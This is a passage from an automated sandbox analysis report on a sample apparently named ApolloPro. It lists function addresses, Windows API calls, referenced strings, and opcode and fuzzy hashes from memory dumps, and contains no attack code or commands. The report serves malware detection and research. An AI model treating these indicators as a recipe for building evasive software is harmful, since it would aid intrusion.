                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                              • String ID:
                                                                                              • API String ID: 3215588206-0
                                                                                              • Opcode ID: 6736ffcdfbb0fbc2a649fe596a6de8c23de277cc89051c206571c614bc4c18d1
                                                                                              • Instruction ID: a03ad58cc40dc69a04150dd2e89d09d4c62bc079bda3e0991b6a0fcff622a7a6
                                                                                              • Opcode Fuzzy Hash: 6736ffcdfbb0fbc2a649fe596a6de8c23de277cc89051c206571c614bc4c18d1
                                                                                              • Instruction Fuzzy Hash: 63416670E04319AADB509FB68C49D6EFFF9EF51B10F10452FE509E7290DAB8A801CE91
                                                                                              Function 0068B13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0068B17B
                                                                                              • __swprintf.LIBCMT ref: 0068B21C
                                                                                              • _wcscmp.LIBCMT ref: 0068B22F
                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0068B284
                                                                                              • _wcscmp.LIBCMT ref: 0068B2C0
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0068B2F7
                                                                                              • GetDlgCtrlID.USER32(?), ref: 0068B349
                                                                                              • GetWindowRect.USER32(?,?), ref: 0068B37F
                                                                                              • GetParent.USER32(?), ref: 0068B39D
                                                                                              • ScreenToClient.USER32(00000000), ref: 0068B3A4
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 0068B41E
                                                                                              • _wcscmp.LIBCMT ref: 0068B432
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 0068B458
                                                                                              • _wcscmp.LIBCMT ref: 0068B46C
                                                                                                • Part of subcall function 0065385C: _iswctype.LIBCMT ref: 00653864
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                              • String ID: %s%u
                                                                                              • API String ID: 3744389584-679674701
                                                                                              • Opcode ID: 28c9442d2c4555fb6a6a7c2387d46a85e06ec64b8dc443f31ebf0b953b831a9a
                                                                                              • Instruction ID: 027c073c6036eb22bf76c5e0d22f12b4a285339e6169f7cd3f877f3a921cd052
                                                                                              • Opcode Fuzzy Hash: 28c9442d2c4555fb6a6a7c2387d46a85e06ec64b8dc443f31ebf0b953b831a9a
                                                                                              • Instruction Fuzzy Hash: 43A1F071204306EBD714EF60C885FEAB7EAFF48350F005629F999D2291DB30EA55CB90
                                                                                              Function 0068BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 0068BAB1
                                                                                              • _wcscmp.LIBCMT ref: 0068BAC2
                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 0068BAEA
                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 0068BB07
                                                                                              • _wcscmp.LIBCMT ref: 0068BB25
                                                                                              • _wcsstr.LIBCMT ref: 0068BB36
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0068BB6E
                                                                                              • _wcscmp.LIBCMT ref: 0068BB7E
                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 0068BBA5
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 0068BBEE
                                                                                              • _wcscmp.LIBCMT ref: 0068BBFE
                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 0068BC26
                                                                                              • GetWindowRect.USER32(00000004,?), ref: 0068BC8F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                              • String ID: @$ThumbnailClass
                                                                                              • API String ID: 1788623398-1539354611
                                                                                              • Opcode ID: 1c8f135e9c8e9e4ba30042ea3d68fe0936275b4bb9003f379c5c8e0254d74ac6
                                                                                              • Instruction ID: 60f210c0b6bcba4a9e05e331ee8f1b965d1bfef375d9d1b062c8273a75bb16e2
                                                                                              • Opcode Fuzzy Hash: 1c8f135e9c8e9e4ba30042ea3d68fe0936275b4bb9003f379c5c8e0254d74ac6
                                                                                              • Instruction Fuzzy Hash: EA81B1710043059BDB14EF14C885FAA77EAFF44314F04A669FD899A196DB30DD4ACB61
                                                                                              Function 0068B8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                              • API String ID: 1038674560-1810252412
                                                                                              • Opcode ID: 9868b8aec07632e0420895a0d3c59f8a33e92e8fef348b84258bea6b0c6abb4c
                                                                                              • Instruction ID: 0cc079fad9d7758a3b81f3bd9058b12825bf1c400378652656406989a2f4e2af
                                                                                              • Opcode Fuzzy Hash: 9868b8aec07632e0420895a0d3c59f8a33e92e8fef348b84258bea6b0c6abb4c
                                                                                              • Instruction Fuzzy Hash: 2B31E030A41305A6CF14FBA1CD53EED77A7AF23790F210228F941B51D2EF656E04865A
                                                                                              Function 0068CB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadIconW.USER32(00000063), ref: 0068CBAA
                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0068CBBC
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0068CBD3
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0068CBE8
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0068CBEE
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 0068CBFE
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0068CC04
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0068CC25
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0068CC3F
                                                                                              • GetWindowRect.USER32(?,?), ref: 0068CC48
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0068CCB3
                                                                                              • GetDesktopWindow.USER32 ref: 0068CCB9
                                                                                              • GetWindowRect.USER32(00000000), ref: 0068CCC0
                                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0068CD0C
                                                                                              • GetClientRect.USER32(?,?), ref: 0068CD19
                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0068CD3E
                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0068CD69
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                              • String ID:
                                                                                              • API String ID: 3869813825-0
                                                                                              • Opcode ID: c470018a29956a2f1f94167e2259e0cd6773c0ea2126b1c8f1c2df6928d4ac66
                                                                                              • Instruction ID: 40bda56768df5732b6f1675f073ae682f81e605178c1a5f8b1f9d9e675def110
                                                                                              • Opcode Fuzzy Hash: c470018a29956a2f1f94167e2259e0cd6773c0ea2126b1c8f1c2df6928d4ac66
                                                                                              • Instruction Fuzzy Hash: 12515170900709EFEB20EFA9CD85FAEBBF6FF04715F004619E546A26A0C775A954CB50
                                                                                              Function 006BA7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006BA87E
                                                                                              • DestroyWindow.USER32(00000000,?), ref: 006BA8F8
                                                                                                • Part of subcall function 00641821: _memmove.LIBCMT ref: 0064185B
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006BA972
                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006BA994
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006BA9A7
                                                                                              • DestroyWindow.USER32(00000000), ref: 006BA9C9
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00630000,00000000), ref: 006BAA00
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006BAA19
                                                                                              • GetDesktopWindow.USER32 ref: 006BAA32
                                                                                              • GetWindowRect.USER32(00000000), ref: 006BAA39
                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006BAA51
                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006BAA69
                                                                                                • Part of subcall function 006329AB: GetWindowLongW.USER32(?,000000EB), ref: 006329BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                              • String ID: 0$tooltips_class32
                                                                                              • API String ID: 1297703922-3619404913
                                                                                              • Opcode ID: 7d1f1fef3101bed105595cf1e0461c4e6872d57c87a32a8b5491268bc6276930
                                                                                              • Instruction ID: b961f241c44c5c1c5ff71ec401d9ef34d6f1699cb92cb520b8d2ed01ef179a42
                                                                                              • Opcode Fuzzy Hash: 7d1f1fef3101bed105595cf1e0461c4e6872d57c87a32a8b5491268bc6276930
                                                                                              • Instruction Fuzzy Hash: C47179B1150204AFE721DF68CC49FBB77E6EB89304F04061DF985973A1D770A982DB62
                                                                                              Function 006BCCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 006BCCCF
                                                                                                • Part of subcall function 006BB1A9: ClientToScreen.USER32(?,?), ref: 006BB1D2
                                                                                                • Part of subcall function 006BB1A9: GetWindowRect.USER32(?,?), ref: 006BB248
                                                                                                • Part of subcall function 006BB1A9: PtInRect.USER32(?,?,006BC6BC), ref: 006BB258
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 006BCD38
                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006BCD43
                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006BCD66
                                                                                              • _wcscat.LIBCMT ref: 006BCD96
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 006BCDAD
                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 006BCDC6
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 006BCDDD
                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 006BCDFF
                                                                                              • DragFinish.SHELL32(?), ref: 006BCE06
                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 006BCEF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                              • API String ID: 169749273-3440237614
                                                                                              • Opcode ID: 976e35ee2df6b5333b850b1493e56081846ba823eab09cd0a93f48fc6c5b5172
                                                                                              • Instruction ID: 96edfb81d6da734aa28fd3cf2321238dd4c241c46b25a301baaf916520ce4426
                                                                                              • Opcode Fuzzy Hash: 976e35ee2df6b5333b850b1493e56081846ba823eab09cd0a93f48fc6c5b5172
                                                                                              • Instruction Fuzzy Hash: 65619E71508301AFD701DF50DC85DAFBBEAEF89350F000A2EF595922A1DB70AA49CB56
                                                                                              Function 006982D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0069831A
                                                                                              • VariantCopy.OLEAUT32(00000000,?), ref: 00698323
                                                                                              • VariantClear.OLEAUT32(00000000), ref: 0069832F
                                                                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0069841D
                                                                                              • __swprintf.LIBCMT ref: 0069844D
                                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00698479
                                                                                              • VariantInit.OLEAUT32(?), ref: 0069852A
                                                                                              • SysFreeString.OLEAUT32(?), ref: 006985BE
                                                                                              • VariantClear.OLEAUT32(?), ref: 00698618
                                                                                              • VariantClear.OLEAUT32(?), ref: 00698627
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 00698665
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                              • API String ID: 3730832054-3931177956
                                                                                              • Opcode ID: f3642c194f948b7cdd3dc6fe67beac41e9016598b327c5240d66af2de69e7b8b
                                                                                              • Instruction ID: 9396b335a0fa91f162c82a0f49ee2cd587bb6cef2cc1680d6e4b13e5617d5ab5
                                                                                              • Opcode Fuzzy Hash: f3642c194f948b7cdd3dc6fe67beac41e9016598b327c5240d66af2de69e7b8b
                                                                                              • Instruction Fuzzy Hash: EBD1BD31604515EFDF609FA5C884BBEB7BABF46B00F148159E805DBA81DF34E845DBA0
                                                                                              Function 006B49CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?), ref: 006B4A61
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006B4AAC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharMessageSendUpper
                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                              • API String ID: 3974292440-4258414348
                                                                                              • Opcode ID: 2354a3def41404f7999111ef49d86755098258b7a5726c5016d481ae88ed8d13
                                                                                              • Instruction ID: 17cd420ed0935442d6f9ddee85a0132d83dad897358430fe52dac839616623cd
                                                                                              • Opcode Fuzzy Hash: 2354a3def41404f7999111ef49d86755098258b7a5726c5016d481ae88ed8d13
                                                                                              • Instruction Fuzzy Hash: A0916E702047119BCB44EF20C851AAAB7A3AF94354F14895DF8965B3A3DF31FD8ACB85
                                                                                              Function 006BBE70 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006BBF26
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006B97E7), ref: 006BBF82
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006BBFBB
                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006BBFFE
                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006BC035
                                                                                              • FreeLibrary.KERNEL32(?), ref: 006BC041
                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006BC051
                                                                                              • DestroyIcon.USER32(?,?,?,?,?,006B97E7), ref: 006BC060
                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006BC07D
                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006BC089
                                                                                                • Part of subcall function 0065312D: __wcsicmp_l.LIBCMT ref: 006531B6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                              • String ID: .dll$.exe$.icl
                                                                                              • API String ID: 1212759294-1154884017
                                                                                              • Opcode ID: 8c4cbe5663beb2c942c28399ee1824e91e97864cddf22b845d2d089065b2ac99
                                                                                              • Instruction ID: f914f74f0e369784c3b93de35010f15dcea1569d328278e85a59338bd860a585
                                                                                              • Opcode Fuzzy Hash: 8c4cbe5663beb2c942c28399ee1824e91e97864cddf22b845d2d089065b2ac99
                                                                                              • Instruction Fuzzy Hash: 2B61E1B1500619FAEB24DF64CC41FFE77AEEB08721F104209F915D61C0DBB5AA90DBA0
                                                                                              Function 0069E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?), ref: 0069E31F
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0069E32F
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0069E33B
                                                                                              • __wsplitpath.LIBCMT ref: 0069E399
                                                                                              • _wcscat.LIBCMT ref: 0069E3B1
                                                                                              • _wcscat.LIBCMT ref: 0069E3C3
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0069E3D8
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0069E3EC
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0069E41E
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0069E43F
                                                                                              • _wcscpy.LIBCMT ref: 0069E44B
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0069E48A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                              • String ID: *.*
                                                                                              • API String ID: 3566783562-438819550
                                                                                              • Opcode ID: e837e76ae4a597e62e0003c0038acd55e462afefd534e97c1a1562a4e27de8be
                                                                                              • Instruction ID: e241e91f4acf94156434a764b8cc1725d6ec90df9d6f8aa7fc067b80763d05b4
                                                                                              • Opcode Fuzzy Hash: e837e76ae4a597e62e0003c0038acd55e462afefd534e97c1a1562a4e27de8be
                                                                                              • Instruction Fuzzy Hash: A86169725042059FCB10EF60C8449AEB3EEBF89310F04891EF98987651DB36EA45CB96
                                                                                              Function 006323F7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 170timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00631F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00632412,?,00000000,?,?,?,?,00631AA7,00000000,?), ref: 00631F76
                                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006324AF
                                                                                              • KillTimer.USER32(-00000001,?,?,?,?,00631AA7,00000000,?,?,00631EBE,?,?), ref: 0063254A
                                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0066BFE7
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00631AA7,00000000,?,?,00631EBE,?,?), ref: 0066C018
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00631AA7,00000000,?,?,00631EBE,?,?), ref: 0066C02F
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00631AA7,00000000,?,?,00631EBE,?,?), ref: 0066C04B
                                                                                              • DeleteObject.GDI32(00000000), ref: 0066C05D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                              • String ID: hl
